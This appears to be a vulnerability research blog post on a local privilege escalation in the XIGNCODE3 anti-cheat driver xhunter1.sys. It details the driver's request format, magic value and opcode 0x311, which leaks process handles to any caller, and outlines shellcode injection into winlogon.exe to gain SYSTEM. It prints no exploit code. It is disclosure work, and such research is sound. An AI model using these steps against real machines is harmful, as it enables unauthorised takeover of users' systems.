XIGNCODE3 xhunter1.sys LPE

From leaked kernel-mode process handle to SYSTEM

XIGNCODE3 is a popular anti-cheat solution provided on a B2B2C basis, predominantly found in online games. This class of software is known for its invasive nature, effectively acting as user-mode rootkits on the user’s system that adopt very aggressive scanning practices in order to detect known cheating tools.

In this instance, the anti-cheat in question also loads a signed driver into the user’s system, which it subsequently interacts with from user-mode in order to perform certain tasks. In this post, we will be exploring the communication mechanism in place, and demonstrate one of the vulnerabilities found in the driver itself.

Before we begin, it is worth noting that any process and any user on the system can interact with the driver in question. The driver is only unloaded from the system when there are zero open handles left to its device. Similarly, the driver allows multiple processes to interact with it at the same time, with no authentication mechanism in place to detect potential malicious use.

The main point of interest here is the DriverEntry function, which as the name implies is the entrypoint for any given Windows driver. The device name is known to be the name of the driver itself, so the primary priority here is to identify any device callback functions, as they are defined in the DriverObject.

Looking into the IoCreateDevice call within DriverEntry, we see the following:

In this context, the rdi register contains a pointer to the driver’s own DriverObject. Looking at the structure of _DRIVER_OBJECT, we can identify the following callback functions:

DriverUnload (offset 0x68): sub_140004934 MajorFunction[IRP_MJ_CREATE] (offset 0x70, IRP index 0): sub_1400045CC MajorFunction[IRP_MJ_CLOSE] (offset 0x80, IRP index 2): sub_14000457C MajorFunction[IRP_MJ_FILE_SYSTEM_CONTROL] (offset 0x90, IRP index 4): sub_140004600

Given this, we can deduce that communications with the driver are facilitated over file write operations rather than through IOCTLs.

Switching over to the filesystem control handler, we see the following:

Reading over the given disassembly and what it does with the IRP given to it, we find out the following: * The write operation is expected to be 0x270 bytes in length * The first DWORD of the packet contents is expected to be the constant 0x270 as well (presumed to be the size field of the header) * The second DWORD of the packet needs to be the constant 0x345821AB (the header’s “magic” value for requests).

If these conditions are met, the opcode handler provided in the handler is invoked with a pointer to the result buffer (pointing to a stack location in the IRP handler) and a pointer to the request content buffer. After the handler executes, the driver allocates an MDL pointing to a location in the invoking process’ virtual memory (as provided in the packet header) 0x2FA bytes in length, and copies the result from its stack to the user-mode location specified. It is worth noting that the contents of the stack location in question aren’t zero’d out at any point, resulting in the potential leaking of kernel-mode pointers.

For reasons of brevity, this post won’t further elaborate on how the packet structure was discovered, or the dispatch process itself. The driver defines a hard-coded list of handlers and their respective opcode in a structure, which the dispatch function goes over. For this LPE exploit, we will be focusing on the opcode handler for 0x311 (785 in decimal), which is located in sub_140001920 for our sample.

In short, this handler takes the PID and access mask provided in the request structure, and returns the respective handle (if any) and the NTSTATUS produced by the function.

Delving into the function invoked by the opcode handler, we see the following:

It’s likely that the expectation by the developer here was that the handle produced would only be valid from within the context of the kernel (indeed, the purpose of the KernelMode KPROCESSOR_MODE here is slightly misleading). This assumption is based on the fact that there are multiple other handlers that expect a handle to be passed for use with certain operations, such as ZwQueryInformationProcess, and copy their result back to usermode. However, due to Win32 intricacies, the produced handle ends up belonging to the process invoking the request to the driver. As per the MSDN documentation for ObOpenObjectByPointer here, specifying OBJ_KERNEL_HANDLE in the HandleAttributes would’ve sufficed for preventing this scenario.

The exploitation process following acquiring a handle is fairly straightforward. As we can acquire a handle to any process on the system at this point, we can allocate memory on the remote process using VirtualAllocEx, copy our shellcode over to the newly-allocated segment using WriteProcessMemory, and finally, invoke CreateRemoteThread to execute our shellcode within its context.

One pitfall to watch out for is the introduction of session 0 isolation following the release of Vista and up. This prevents us from launching a SYSTEM shell directly into our session from just about any SYSTEM process. Thankfully, we can get around this by discovering the PID of the winlogon.exe session belonging to our user and injecting our code into that instead.

A proof-of-concept leveraging the findings above can be found here. This proof-of-concept has been tested on Windows 10 version 1803 x64, but should work on all x86 and x64 versions of Windows following Vista.

The sample of xhunter1.sys used for the research above has the following hashes: